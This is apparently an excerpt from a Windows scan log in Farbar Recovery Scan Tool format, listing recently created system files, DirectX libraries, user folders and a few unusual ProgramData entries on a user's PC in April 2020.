2020-04-16 17:03 - 2020-04-16 17:03 - 000912896 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000892416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000865280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000865280 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000840704 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Language.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000822208 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 000811320 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000785920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000772096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2020-04-16 17:03 - 2020-04-16 17:03 - 000759272 _____ (Microsoft Corporation) C:\WINDOWS\system32\taskschd.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000747320 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000729600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FlightSettings.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000701440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BTAGService.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000684560 _____ (Microsoft Corporation) C:\WINDOWS\system32\SHCore.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000673704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000638480 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000632832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000629760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000628616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000618296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000605184 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 000604984 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcasvc.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000561464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2020-04-16 17:03 - 2020-04-16 17:03 - 000550400 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2020-04-16 17:03 - 2020-04-16 17:03 - 000530432 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcext.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000516096 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 000515600 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000513576 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000510792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64win.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000507152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\taskschd.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000498688 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntshrui.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000491008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppcext.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000487784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\advapi32.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000477496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2020-04-16 17:03 - 2020-04-16 17:03 - 000465208 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000459688 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 000456504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2020-04-16 17:03 - 2020-04-16 17:03 - 000410112 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000408064 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000406480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Enumeration.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000401408 _____ (Microsoft Corporation) C:\WINDOWS\system32\es.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncbservice.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000355840 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicSvc.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpr.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 000330240 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 000324408 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2020-04-16 17:03 - 2020-04-16 17:03 - 000323584 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcommdlg.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicCapsule.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000277864 _____ (Microsoft Corporation) C:\WINDOWS\system32\LsaIso.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 000277504 _____ (Microsoft Corporation) C:\WINDOWS\system32\scecli.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000268008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000259776 _____ (Microsoft Corporation) C:\WINDOWS\system32\logoncli.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\VPNv2CSP.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000251704 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanagerprecheck.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallServiceTasks.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000203264 _____ (Microsoft Corporation) C:\WINDOWS\system32\LanguageComponentsInstaller.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000197632 _____ (Microsoft Corporation) C:\WINDOWS\system32\Win32CompatibilityAppraiserCSP.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000185952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000179712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallServiceTasks.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000179712 _____ (Microsoft Corporation) C:\WINDOWS\system32\t2embed.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000178192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys
2020-04-16 17:03 - 2020-04-16 17:03 - 000164368 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 000163840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000152408 _____ (Microsoft Corporation) C:\WINDOWS\system32\KerbClientShared.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000147696 _____ (Microsoft Corporation) C:\WINDOWS\system32\smss.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 000142544 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicensingUI.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\slc.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000136192 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppc.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000127280 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32u.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000123952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KerbClientShared.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000122368 _____ (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\slc.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000115120 _____ (Microsoft Corporation) C:\WINDOWS\system32\phoneactivate.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 000105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000102216 _____ (Microsoft Corporation) C:\WINDOWS\system32\changepk.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 000101888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppc.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000089336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32u.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicAgent.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dot3api.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dot3msm.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000071680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Custom.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000071480 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32appinventorycsp.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\keepaliveprovider.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000066624 _____ (Microsoft Corporation) C:\WINDOWS\system32\iumcrypt.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcadm.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000060928 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf3216.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000058880 _____ C:\WINDOWS\system32\runexehelper.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 000051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcalua.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 000050544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudNotifications.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 000049152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tbauth.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpgradeResultsUI.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 000036152 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 000033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\sxssrv.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000033080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hwpolicy.sys
2020-04-16 17:03 - 2020-04-16 17:03 - 000031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wksprtPS.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cmintegrator.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000029184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerCookies.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 000028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicPS.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\slcext.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\sbservicetrigger.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000019968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\slcext.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000017920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wksprtPS.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsunattend.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 000015872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Custom.ps.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\dciman32.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcaevts.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\pacjsworker.exe
2020-04-16 17:03 - 2020-04-16 17:03 - 000010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMAlertListener.ProxyStub.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimg32.dll
2020-04-16 17:03 - 2020-04-16 17:03 - 000003072 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpk.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 017790464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 007849216 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 003708928 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 003587384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2020-04-16 17:02 - 2020-04-16 17:02 - 003109376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 002717184 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2020-04-16 17:02 - 2020-04-16 17:02 - 002131456 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcDesktopMonSvc.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 002126144 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 002114560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.CloudStore.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 001960448 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 001942528 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 001783296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 001762816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 001719808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Wpc.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 001497600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 001413704 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 001263856 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcMon.exe
2020-04-16 17:02 - 2020-04-16 17:02 - 001180672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 001127424 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcRefreshTask.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 001071616 _____ (Microsoft Corporation) C:\WINDOWS\system32\BTAGService.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000893952 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000879616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.Service.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000874296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2020-04-16 17:02 - 2020-04-16 17:02 - 000735744 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000722072 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000654912 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000637240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2020-04-16 17:02 - 2020-04-16 17:02 - 000589384 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2020-04-16 17:02 - 2020-04-16 17:02 - 000524264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Enumeration.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000441144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2020-04-16 17:02 - 2020-04-16 17:02 - 000437560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2020-04-16 17:02 - 2020-04-16 17:02 - 000416016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000355328 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcApi.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000339304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000297272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2020-04-16 17:02 - 2020-04-16 17:02 - 000278016 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcTok.exe
2020-04-16 17:02 - 2020-04-16 17:02 - 000268288 _____ (Microsoft Corporation) C:\WINDOWS\system32\dot3svc.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000265216 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateDeploymentProvider.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000251392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\winnat.sys
2020-04-16 17:02 - 2020-04-16 17:02 - 000231912 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000193848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2020-04-16 17:02 - 2020-04-16 17:02 - 000169472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpatialAudioLicenseSrv.exe
2020-04-16 17:02 - 2020-04-16 17:02 - 000158720 _____ (Microsoft Corporation) C:\WINDOWS\system32\umpo.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000151352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\scmbus.sys
2020-04-16 17:02 - 2020-04-16 17:02 - 000129024 _____ (Microsoft Corporation) C:\WINDOWS\system32\UtcDecoderHost.exe
2020-04-16 17:02 - 2020-04-16 17:02 - 000108032 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000103936 _____ (Microsoft Corporation) C:\WINDOWS\system32\dot3msm.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000096768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Custom.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\dot3api.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000089912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\volmgr.sys
2020-04-16 17:02 - 2020-04-16 17:02 - 000088352 _____ (Microsoft Corporation) C:\WINDOWS\system32\remoteaudioendpoint.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000076288 _____ (Microsoft Corporation) C:\WINDOWS\system32\autopilot.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.EnrollmentStatusTracking.ConfigProvider.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\tbauth.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudNotifications.exe
2020-04-16 17:02 - 2020-04-16 17:02 - 000059192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storufs.sys
2020-04-16 17:02 - 2020-04-16 17:02 - 000057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000057344 _____ (Microsoft Corporation) C:\WINDOWS\system32\audioresourceregistrar.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000047000 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2020-04-16 17:02 - 2020-04-16 17:02 - 000044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.Common.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiredNetworkCSP.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000039424 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcProxyStubs.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerCookies.exe
2020-04-16 17:02 - 2020-04-16 17:02 - 000030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\KNetPwrDepBroker.sys
2020-04-16 17:02 - 2020-04-16 17:02 - 000028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\flpydisk.sys
2020-04-16 17:02 - 2020-04-16 17:02 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Custom.ps.dll
2020-04-16 17:02 - 2020-04-16 17:02 - 000018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sfloppy.sys
2020-04-16 16:14 - 2020-04-16 16:16 - 000492544 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2020-04-16 16:14 - 2020-04-16 16:16 - 000390656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2020-04-16 09:39 - 2020-04-16 09:39 - 000000000 ____D C:\Users\Javi\Downloads\irpf situacion familiar 2
2020-04-16 09:38 - 2020-04-16 09:38 - 000000000 ____D C:\Users\Javi\Downloads\cantabria 426 fotos
2020-04-15 09:58 - 2020-04-15 09:58 - 000142219 _____ C:\Users\Javi\Documents\Permiso movilidad fernandina.pdf
2020-04-14 16:36 - 2020-04-14 16:37 - 000000000 ____D C:\Users\Javi\Downloads\WINDOWS DESCARGAS
2020-04-14 14:59 - 2020-04-14 14:59 - 000000000 ____D C:\Users\Javi\Downloads\Documentos
2020-04-14 13:06 - 2020-04-14 13:06 - 000000000 ____D C:\Users\Javi\AppData\Roaming\DiskTuna
2020-04-14 13:05 - 2020-04-14 13:05 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\JPEG Recovery LAB
2020-04-14 13:05 - 2020-04-14 13:05 - 000000000 ____D C:\Program Files\Disktuna
2020-04-14 10:49 - 2020-05-02 12:38 - 000000000 _RSHD C:\ProgramData\Key-Base
2020-04-14 10:49 - 2020-04-14 10:49 - 000000000 ____D C:\ProgramData\{DA9111F8-0BBC-33F2-F066-11C2AF00E41D}
2020-04-11 19:34 - 2020-04-11 19:34 - 000002074 _____ C:\Users\Public\Desktop\Portal 2.lnk
2020-04-11 19:34 - 2020-04-11 19:34 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Valve
2020-04-11 19:11 - 2020-04-11 19:11 - 000000000 ____D C:\Program Files (x86)\Valve
2020-04-11 13:08 - 2020-04-11 13:08 - 000001193 _____ C:\Users\Javi\Desktop\Launcher.lnk
2020-04-10 17:17 - 2020-04-10 17:17 - 000000000 _____ C:\WINDOWS\system32\OLD53A3.tmp
2020-04-10 17:16 - 2007-07-20 00:57 - 000411496 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_9.dll
2020-04-10 17:16 - 2007-07-20 00:57 - 000267112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xactengine2_9.dll
2020-04-10 17:16 - 2007-07-20 00:54 - 000021352 _____ (Microsoft Corporation) C:\WINDOWS\system32\SET59B3.tmp
2020-04-10 17:16 - 2007-07-19 18:14 - 005073256 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_35.dll
2020-04-10 17:16 - 2007-07-19 18:14 - 003727720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx9_35.dll
2020-04-10 17:16 - 2007-07-19 18:14 - 001985904 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_35.dll
2020-04-10 17:16 - 2007-07-19 18:14 - 001358192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_35.dll
2020-04-10 17:16 - 2007-07-19 18:14 - 000508264 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10_35.dll
2020-04-10 17:16 - 2007-07-19 18:14 - 000444776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx10_35.dll
2020-04-10 17:16 - 2007-06-20 20:49 - 000409960 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_8.dll
2020-04-10 17:16 - 2007-06-20 20:46 - 000266088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xactengine2_8.dll
2020-04-10 17:16 - 2007-05-16 16:45 - 004496232 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_34.dll
2020-04-10 17:16 - 2007-05-16 16:45 - 003497832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx9_34.dll
2020-04-10 17:16 - 2007-05-16 16:45 - 001401200 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_34.dll
2020-04-10 17:16 - 2007-05-16 16:45 - 001124720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_34.dll
2020-04-10 17:16 - 2007-05-16 16:45 - 000506728 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10_34.dll
2020-04-10 17:16 - 2007-05-16 16:45 - 000443752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx10_34.dll
